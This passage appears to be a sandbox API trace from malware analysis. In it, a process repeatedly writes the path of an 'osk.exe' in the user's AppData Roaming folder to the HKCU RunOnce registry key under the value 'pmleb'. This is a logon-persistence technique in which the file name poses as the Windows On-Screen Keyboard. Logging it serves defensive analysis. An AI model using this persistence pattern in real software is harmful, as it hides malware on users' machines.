FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0092.345] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.345] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7c [0092.345] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.346] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0092.346] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.346] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.346] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.346] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.346] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.346] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.346] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.347] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.347] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.347] RegCloseKey (hKey=0x280) returned 0x0 [0092.347] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.347] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.347] SetTimer (hWnd=0x20280, nIDEvent=0x21f7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f7 [0092.347] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.357] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.357] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.358] KillTimer (hWnd=0x20280, uIDEvent=0x21f7) returned 1 [0092.358] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.358] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.358] IUnknown:Release (This=0x787518) returned 0x1 [0092.358] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.358] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.358] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.359] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 
[0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.359] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0092.359] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.359] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7d [0092.359] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, 
puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.360] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7c [0092.360] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.360] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.360] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.360] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.360] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.361] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.361] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.361] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, 
lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.361] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.361] RegCloseKey (hKey=0x280) returned 0x0 [0092.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.361] SetTimer (hWnd=0x20280, nIDEvent=0x21f8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f8 [0092.362] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.373] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.373] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.373] KillTimer (hWnd=0x20280, uIDEvent=0x21f8) returned 1 [0092.373] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.374] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.374] IUnknown:Release (This=0x787518) returned 0x1 [0092.374] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.374] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.374] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.374] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), 
ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.374] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.375] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0092.375] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.375] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7e [0092.375] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.376] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7d [0092.376] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.376] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.376] IUnknown:Release (This=0x7a9740) 
returned 0x1 [0092.376] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.377] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.377] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.377] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.377] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.377] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.377] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.378] RegCloseKey (hKey=0x280) returned 0x0 [0092.378] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.378] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.378] SetTimer (hWnd=0x20280, nIDEvent=0x21f9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f9 [0092.378] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0092.396] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.396] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.396] KillTimer (hWnd=0x20280, uIDEvent=0x21f9) returned 1 [0092.397] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.397] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.397] IUnknown:Release (This=0x787518) returned 0x1 [0092.397] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.397] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.397] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.397] 
FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.397] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.397] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.397] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.398] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7e [0092.398] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.398] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7f [0092.398] 
FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.399] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7e [0092.399] IUnknown:AddRef (This=0x7a9740) returned 0x2 